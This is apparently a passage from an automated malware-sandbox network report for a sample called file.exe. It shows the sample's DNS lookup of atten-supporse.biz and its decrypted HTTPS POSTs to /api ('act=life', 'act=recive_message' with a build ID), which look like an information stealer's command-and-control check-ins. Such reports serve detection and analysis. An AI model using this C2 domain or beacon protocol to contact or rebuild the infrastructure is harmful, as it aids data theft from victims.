Dec 10, 2024 00:42:08.639755964 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:08.639831066 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:08.641100883 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:08.641110897 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:08.641352892 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:08.642631054 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:08.642750978 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:08.642786980 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:08.642834902 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:08.683339119 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:09.915636063 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:09.915714979 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:09.915771008 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:09.921360016 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:09.921369076 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:10.250716925 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:10.250741005 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:10.250818014 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:10.251302004 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:10.251316071 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:11.471968889 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:11.472060919 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:11.473352909 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:11.473359108 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:11.473556995 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:11.474848986 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:11.475008965 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:11.475035906 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:11.475106001 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:11.475114107 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:12.381974936 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:12.382055998 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:12.382106066 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:12.382208109 CET	49708	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:12.382217884 CET	443	49708	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:12.710572004 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:12.710621119 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:12.710689068 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:12.710992098 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:12.711009026 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:13.925858021 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:13.925966024 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:13.927337885 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:13.927350998 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:13.927563906 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:13.928920031 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:13.928987980 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:13.928994894 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:14.651400089 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:14.651482105 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:14.651542902 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:14.651685953 CET	49709	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:14.651710033 CET	443	49709	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:15.147656918 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:15.147687912 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:15.147795916 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:15.148119926 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:15.148133039 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.366621017 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.366704941 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.367844105 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.367854118 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.368052959 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.369353056 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370143890 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370173931 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.370280981 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370307922 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.370409966 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370449066 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.370578051 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370599031 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.370743036 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370773077 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.370933056 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370961905 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.370975971 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.370985985 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.371110916 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.371139050 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.371159077 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.371305943 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.371337891 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.411339045 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.411509991 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.411535978 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.411561012 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.411577940 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:16.411613941 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:16.411627054 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:19.984400988 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:19.984494925 CET	443	49710	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:19.984690905 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:19.984714031 CET	49710	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:20.086618900 CET	49716	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:20.086649895 CET	443	49716	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:20.086751938 CET	49716	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:20.087059975 CET	49716	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:20.087074995 CET	443	49716	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:20.281960011 CET	49716	443	192.168.2.5	104.21.80.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 00:42:00.288780928 CET	60747	53	192.168.2.5	1.1.1.1
Dec 10, 2024 00:42:00.615567923 CET	53	60747	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 00:42:00.288780928 CET	192.168.2.5	1.1.1.1	0xf18c	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 00:42:00.615567923 CET	1.1.1.1	192.168.2.5	0xf18c	No error (0)	atten-supporse.biz	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:00.615567923 CET	1.1.1.1	192.168.2.5	0xf18c	No error (0)	atten-supporse.biz	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:00.615567923 CET	1.1.1.1	192.168.2.5	0xf18c	No error (0)	atten-supporse.biz	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:00.615567923 CET	1.1.1.1	192.168.2.5	0xf18c	No error (0)	atten-supporse.biz	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:00.615567923 CET	1.1.1.1	192.168.2.5	0xf18c	No error (0)	atten-supporse.biz	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:00.615567923 CET	1.1.1.1	192.168.2.5	0xf18c	No error (0)	atten-supporse.biz	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:00.615567923 CET	1.1.1.1	192.168.2.5	0xf18c	No error (0)	atten-supporse.biz	104.21.32.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

atten-supporse.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.80.1	443	3944	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:01 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 23:42:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 23:42:02 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=esncjo76hjip57udcrelmn44f3; expires=Fri, 04-Apr-2025 17:28:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oy7MC9udKGT5yeD6qja4aS2f%2F%2F%2FLH5bjeauUI6OHKEbLJELqUk7FGyAeIKo2AAqrXUpC38Cd%2F1qGVN0JmiI0SXzjWBq0HXc249mERxaMeOYy49xkli9HThyWp9bkyFHNU041OTc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8d96f5ae8c3f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1484&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1967654&cwnd=160&unsent_bytes=0&cid=8f71395974afba10&ts=757&x=0"
2024-12-09 23:42:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 23:42:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.80.1	443	3944	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:03 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-09 23:42:03 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-09 23:42:04 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=si470n0mjah7mbgliqotaj35bk; expires=Fri, 04-Apr-2025 17:28:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BO0DUCkyWnzaMZ5popln7%2Br7WtzAvQNcARwS0H%2FEvbMO5%2Bh91Ib%2BtLimOolfMhMYwj6KoM4UkJ2ChhoCntEnbPDy%2BZhRujtvxAi%2BKLk45sKHl3YBWdBJ2Lym9sNscGEQ6VnI3sY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8d97bdca0429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1741&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1668571&cwnd=246&unsent_bytes=0&cid=58d0589c514d5ff6&ts=736&x=0"
2024-12-09 23:42:04 UTC	348	IN	Data Raw: 34 39 31 63 0d 0a 72 6e 38 64 59 6a 36 59 50 4b 32 79 70 59 42 66 59 35 47 47 38 71 64 52 36 38 65 5a 7a 32 55 6a 36 63 33 4e 54 56 38 30 56 45 66 56 58 57 74 41 42 4b 77 51 6a 38 48 41 6f 6d 55 58 34 2f 4f 58 69 33 4f 4b 6f 37 76 31 41 30 4b 46 76 71 68 68 66 55 49 35 5a 5a 51 5a 66 41 35 4e 2f 52 43 50 31 39 32 69 5a 54 6a 71 70 4a 66 4a 63 39 48 6c 2f 4b 55 48 51 6f 57 76 72 43 59 77 52 44 67 6b 78 68 4e 36 43 6c 76 37 57 4d 7a 65 79 4f 55 36 42 76 44 73 6e 4d 34 38 67 36 71 37 34 30 64 47 6b 2b 2f 33 62 78 4a 52 49 43 62 6a 48 6d 34 4a 48 4f 55 51 31 70 44 41 37 6e 31 5a 73 2b 65 58 78 54 32 4e 6f 2f 4b 6e 44 55 75 4e 72 71 6b 6e 4c 31 30 79 4c 38 59 64 65 51 74 52 38 6b 7a 42 31 4d 2f 75 50 41 7a 77 70 4e 36 46 4e 4a 48 6c 6f 2b 31 55 63 34 69 2b 76 Data Ascii: 491crn8dYj6YPK2ypYBfY5GG8qdR68eZz2Uj6c3NTV80VEfVXWtABKwQj8HAomUX4/OXi3OKo7v1A0KFvqhhfUI5ZZQZfA5N/RCP192iZTjqpJfJc9Hl/KUHQoWvrCYwRDgkxhN6Clv7WMzeyOU6BvDsnM48g6q740dGk+/3bxJRICbjHm4JHOUQ1pDA7n1Zs+eXxT2No/KnDUuNrqknL10yL8YdeQtR8kzB1M/uPAzwpN6FNJHlo+1Uc4i+v
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 52 64 65 51 35 64 39 31 37 64 32 4d 7a 70 4f 42 50 34 37 5a 33 49 4d 34 53 76 39 4b 34 48 52 6f 47 6c 6f 43 55 35 57 7a 73 6a 7a 42 30 2f 54 68 7a 39 52 6f 2b 49 68 38 45 34 45 66 54 6f 68 6f 63 4a 79 62 71 31 74 45 64 47 68 2b 2f 33 62 7a 56 54 4e 53 62 48 45 6e 77 49 56 2b 68 65 33 64 62 4b 35 79 38 48 39 75 71 61 78 69 47 44 71 2f 32 75 44 6b 71 43 71 71 67 72 66 52 68 32 49 74 52 64 4a 30 42 39 39 31 58 44 32 74 44 69 66 52 36 39 2f 64 44 43 50 38 6e 39 75 36 6b 47 52 59 71 72 6f 53 45 35 57 6a 41 72 77 52 4a 35 43 6c 7a 39 56 4d 66 59 78 75 38 32 44 76 50 68 6e 63 45 31 68 61 54 2b 37 55 6b 42 6a 4c 66 76 64 33 31 34 4d 53 62 65 58 30 6f 44 55 76 52 5a 32 5a 44 59 72 43 52 42 39 4f 6a 51 6e 58 4f 48 6f 50 53 2f 42 6c 4f 4f 6f 62 30 6a 4f 46 41 37 4a Data Ascii: RdeQ5d917d2MzpOBP47Z3IM4Sv9K4HRoGloCU5WzsjzB0/Thz9Ro+Ih8E4EfTohocJybq1tEdGh+/3bzVTNSbHEnwIV+he3dbK5y8H9uqaxiGDq/2uDkqCqqgrfRh2ItRdJ0B991XD2tDifR69/dDCP8n9u6kGRYqroSE5WjArwRJ5Clz9VMfYxu82DvPhncE1haT+7UkBjLfvd314MSbeX0oDUvRZ2ZDYrCRB9OjQnXOHoPS/BlOOob0jOFA7J
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 44 55 76 52 5a 32 5a 44 59 72 43 52 42 39 4f 6a 51 6e 58 4f 45 72 66 36 6f 43 45 43 42 6f 61 6f 6c 4d 56 34 34 4a 74 34 53 65 77 42 51 38 6c 54 43 33 73 50 71 4e 41 72 34 34 70 44 45 4f 63 6e 72 75 36 6f 66 41 64 50 76 6d 79 67 78 57 7a 6c 6e 2b 52 35 78 44 6c 76 73 48 74 43 65 33 71 49 36 44 62 4f 38 30 4d 6b 36 69 61 37 78 71 51 64 47 68 71 71 73 4b 44 35 62 4d 53 2f 43 47 6e 73 4d 56 66 64 59 7a 39 66 44 35 79 38 45 2b 75 69 63 68 58 33 4a 6f 75 50 74 58 77 47 6b 71 4c 6b 73 45 6c 55 6e 4c 49 77 43 4d 52 6b 63 2f 56 4b 50 69 49 66 6c 4f 41 6e 34 34 70 6a 46 49 59 79 72 38 4b 77 4e 52 34 71 69 6f 79 6b 39 56 7a 59 6a 77 42 31 34 42 30 37 6f 57 38 6e 43 7a 61 4a 7a 51 66 54 38 30 4a 31 7a 76 37 58 73 76 42 45 44 76 71 79 68 49 54 70 41 64 6a 71 43 42 44 Data Ascii: DUvRZ2ZDYrCRB9OjQnXOErf6oCECBoaolMV44Jt4SewBQ8lTC3sPqNAr44pDEOcnru6ofAdPvmygxWzln+R5xDlvsHtCe3qI6DbO80Mk6ia7xqQdGhqqsKD5bMS/CGnsMVfdYz9fD5y8E+uichX3JouPtXwGkqLksElUnLIwCMRkc/VKPiIflOAn44pjFIYyr8KwNR4qioyk9VzYjwB14B07oW8nCzaJzQfT80J1zv7XsvBEDvqyhITpAdjqCBD
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 56 4e 33 59 79 65 38 32 44 76 6a 32 6b 4d 67 33 68 61 48 7a 70 67 30 42 78 65 2b 6f 4e 33 30 4f 64 68 44 42 45 6e 38 44 53 72 70 42 67 63 6d 48 35 54 46 42 71 36 53 63 79 7a 4f 47 71 66 65 6d 44 30 43 48 6f 61 67 71 4e 46 34 2b 4e 38 30 5a 64 77 46 53 39 56 2f 4c 31 63 4c 6d 4f 67 58 31 36 39 43 4c 63 34 36 39 75 2f 56 48 62 71 79 61 37 51 34 48 46 69 6c 72 31 56 31 34 44 42 79 69 48 73 50 54 79 2b 6f 79 42 2f 72 6f 6d 73 77 34 68 61 37 2f 6f 51 35 45 6a 61 36 71 4b 6a 78 53 4f 69 2f 4b 48 6e 77 50 55 2f 56 57 6a 35 36 48 35 53 56 42 71 36 53 31 30 6a 69 48 6f 37 75 79 53 56 6a 4c 71 4b 4e 76 5a 52 59 36 4c 4d 6f 62 65 67 78 64 2f 46 62 4b 32 4d 50 6a 4f 77 66 77 36 35 54 41 4d 6f 61 68 39 36 4d 4e 51 49 71 6a 70 43 41 32 55 33 5a 72 6a 42 70 6e 51 41 53 Data Ascii: VN3Yye82Dvj2kMg3haHzpg0Bxe+oN30OdhDBEn8DSrpBgcmH5TFBq6ScyzOGqfemD0CHoagqNF4+N80ZdwFS9V/L1cLmOgX169CLc469u/VHbqya7Q4HFilr1V14DByiHsPTy+oyB/romsw4ha7/oQ5Eja6qKjxSOi/KHnwPU/VWj56H5SVBq6S10jiHo7uySVjLqKNvZRY6LMobegxd/FbK2MPjOwfw65TAMoah96MNQIqjpCA2U3ZrjBpnQAS
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 4d 44 6e 4e 67 37 2f 70 4e 36 46 4e 4a 48 6c 6f 2b 30 70 53 70 69 34 72 43 45 32 51 43 31 6c 30 31 4e 6d 51 46 76 32 48 70 65 51 78 4f 6b 32 42 66 50 6f 6b 4d 45 2b 69 62 66 30 71 67 42 49 67 4c 32 6c 4b 44 70 64 50 69 37 44 47 32 30 4d 55 75 68 62 33 63 4b 48 72 48 30 47 36 36 54 49 68 51 57 4f 74 65 75 75 52 58 43 64 72 4c 6b 6b 4d 46 70 32 4f 6f 49 45 50 77 64 51 75 67 61 50 31 73 6a 72 50 67 37 79 37 5a 7a 49 4e 6f 43 67 2b 71 73 44 53 34 47 76 71 53 6b 38 55 7a 77 6d 7a 52 64 32 42 31 54 39 58 64 32 51 69 61 49 36 47 62 4f 38 30 4f 77 30 6d 36 76 72 37 52 67 50 6b 75 2b 6f 49 33 30 4f 64 69 48 47 45 6e 73 48 55 50 78 62 79 64 33 47 37 54 77 42 2f 4f 43 62 7a 44 57 49 71 50 36 67 41 31 4f 42 70 4b 41 6a 4e 46 6f 37 5a 59 4a 64 65 42 67 63 6f 68 37 2b Data Ascii: MDnNg7/pN6FNJHlo+0pSpi4rCE2QC1l01NmQFv2HpeQxOk2BfPokME+ibf0qgBIgL2lKDpdPi7DG20MUuhb3cKHrH0G66TIhQWOteuuRXCdrLkkMFp2OoIEPwdQugaP1sjrPg7y7ZzINoCg+qsDS4GvqSk8UzwmzRd2B1T9Xd2QiaI6GbO80Ow0m6vr7RgPku+oI30OdiHGEnsHUPxbyd3G7TwB/OCbzDWIqP6gA1OBpKAjNFo7ZYJdeBgcoh7+
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 41 4c 34 65 36 62 77 44 36 45 71 50 69 72 41 55 71 48 76 61 59 76 50 6c 31 32 61 34 77 61 5a 30 41 45 75 6e 33 59 78 73 33 6c 4d 52 66 34 35 5a 50 54 50 70 6e 6c 74 65 30 57 52 70 72 76 39 7a 6b 74 51 54 45 36 67 67 51 2f 42 31 43 36 42 6f 2f 57 7a 75 51 36 42 2f 33 32 6c 63 4d 38 68 71 7a 79 71 51 39 43 69 36 75 72 4b 44 68 56 4f 69 37 4c 48 6e 41 45 56 66 52 58 77 4a 43 4a 6f 6a 6f 5a 73 37 7a 51 35 43 69 4b 71 66 62 74 47 41 2b 53 37 36 67 6a 66 51 35 32 4b 63 49 59 66 77 70 61 2f 6c 76 4a 32 73 4c 69 4e 67 4c 38 34 4a 62 42 50 49 6d 75 38 71 77 42 52 49 47 6b 71 53 49 2b 55 44 42 6c 67 6c 31 34 47 42 79 69 48 75 2f 4c 79 75 34 36 51 65 79 71 69 59 55 30 68 65 57 6a 37 51 78 4e 6a 36 69 76 49 6a 35 65 4d 79 48 47 47 48 38 49 54 76 4a 65 79 4d 4c 56 34 Data Ascii: AL4e6bwD6EqPirAUqHvaYvPl12a4waZ0AEun3Yxs3lMRf45ZPTPpnlte0WRprv9zktQTE6ggQ/B1C6Bo/WzuQ6B/32lcM8hqzyqQ9Ci6urKDhVOi7LHnAEVfRXwJCJojoZs7zQ5CiKqfbtGA+S76gjfQ52KcIYfwpa/lvJ2sLiNgL84JbBPImu8qwBRIGkqSI+UDBlgl14GByiHu/Lyu46QeyqiYU0heWj7QxNj6ivIj5eMyHGGH8ITvJeyMLV4
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 38 30 50 74 7a 6d 36 62 72 72 67 68 51 74 65 2f 33 4e 67 4d 57 50 54 50 4c 44 58 77 57 56 2f 64 53 33 75 36 48 75 6d 6c 54 6f 62 62 43 6c 79 7a 4a 75 73 54 6a 52 30 44 4c 39 35 59 32 66 55 42 32 66 5a 35 54 50 78 49 63 6f 68 36 49 30 39 58 77 4f 77 4c 6c 35 39 66 37 44 61 36 7a 38 61 6f 58 52 70 79 67 37 32 46 39 57 58 5a 39 39 56 31 32 42 30 66 72 53 4d 4c 41 77 4b 49 43 54 37 50 38 30 4a 31 7a 76 4b 62 31 6f 77 42 58 6d 75 4b 49 4f 54 64 52 4a 69 4c 62 45 6a 39 4f 48 50 77 65 6c 34 4f 4a 6f 6a 6b 51 73 37 7a 41 6c 32 6a 63 39 71 7a 39 56 56 37 46 74 75 38 35 66 51 35 6b 61 34 77 50 50 31 67 63 76 56 33 64 77 73 48 68 4b 77 4b 30 32 71 37 69 4b 59 53 6a 37 4c 77 35 66 34 79 31 6f 69 6b 71 52 33 6f 77 7a 78 4e 78 42 30 71 36 45 49 2f 66 68 37 6f 45 51 62 Data Ascii: 80Ptzm6brrghQte/3NgMWPTPLDXwWV/dS3u6HumlTobbClyzJusTjR0DL95Y2fUB2fZ5TPxIcoh6I09XwOwLl59f7Da6z8aoXRpyg72F9WXZ99V12B0frSMLAwKICT7P80J1zvKb1owBXmuKIOTdRJiLbEj9OHPwel4OJojkQs7zAl2jc9qz9VV7Ftu85fQ5ka4wPP1gcvV3dwsHhKwK02q7iKYSj7Lw5f4y1oikqR3owzxNxB0q6EI/fh7oEQb
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 61 39 6e 33 6f 50 68 55 46 74 76 39 73 47 45 6b 46 69 42 6c 6c 45 38 78 51 45 36 36 42 6f 2b 58 78 50 41 76 42 2f 44 79 6b 34 49 4e 74 34 4c 31 71 67 5a 58 6d 37 69 67 45 51 4e 44 4e 53 76 43 47 6d 6b 52 48 4c 51 65 77 4a 43 66 32 33 31 4a 73 39 76 65 68 53 76 4a 2f 62 75 59 42 45 2b 46 71 4c 6b 2b 63 48 45 34 49 73 30 4c 62 78 64 54 75 68 43 50 31 6f 65 36 62 30 2b 7a 34 49 47 46 61 39 6e 33 6f 50 68 55 46 74 76 39 73 47 45 6b 46 69 42 6c 6c 45 38 78 51 45 36 36 42 6f 2b 58 78 50 41 76 42 2f 44 79 6b 34 49 4e 74 34 4c 31 71 67 5a 58 6d 37 69 67 59 42 4e 67 46 78 76 79 43 48 77 4f 55 76 31 49 33 70 43 4a 6f 6a 4a 42 71 39 33 51 6a 58 4f 32 36 37 75 31 52 78 6e 4c 6d 71 77 68 4d 31 45 67 4e 49 45 36 63 51 64 64 37 45 37 59 33 34 6a 4d 43 79 43 7a 71 74 44 Data Ascii: a9n3oPhUFtv9sGEkFiBllE8xQE66Bo+XxPAvB/Dyk4INt4L1qgZXm7igEQNDNSvCGmkRHLQewJCf231Js9vehSvJ/buYBE+FqLk+cHE4Is0LbxdTuhCP1oe6b0+z4IGFa9n3oPhUFtv9sGEkFiBllE8xQE66Bo+XxPAvB/Dyk4INt4L1qgZXm7igYBNgFxvyCHwOUv1I3pCJojJBq93QjXO267u1RxnLmqwhM1EgNIE6cQdd7E7Y34jMCyCzqtD
2024-12-09 23:42:04 UTC	1369	IN	Data Raw: 66 79 54 4f 57 79 5a 71 4c 38 73 66 32 63 67 4a 73 77 54 65 45 41 53 75 6b 61 50 69 49 66 50 4c 77 62 6a 35 39 43 4c 63 34 58 6c 6f 2b 30 4b 55 34 79 2f 72 47 4d 36 54 44 46 6c 30 31 4e 6d 51 45 71 36 42 70 79 65 68 2f 42 39 57 62 4f 6a 6e 73 67 79 69 71 76 34 76 78 56 48 69 4c 6d 73 61 41 4e 6f 47 7a 66 4c 44 58 78 43 62 66 64 61 32 63 58 45 38 6a 6f 2f 7a 63 6d 43 77 69 4f 4b 35 39 65 71 43 6b 32 31 6b 5a 67 2b 4f 6b 5a 30 41 38 38 4c 66 45 41 53 75 6b 61 50 69 49 66 50 4c 77 62 6a 35 39 4c 70 4e 49 53 70 75 37 4a 4a 57 4d 75 35 37 33 64 75 47 48 59 33 6a 45 55 2f 52 31 2f 6f 54 4d 6e 54 30 65 46 36 50 38 33 4a 67 73 49 6a 69 75 66 4b 6f 41 4e 58 6e 71 79 2f 4b 41 4e 6f 47 7a 66 4c 44 58 78 43 65 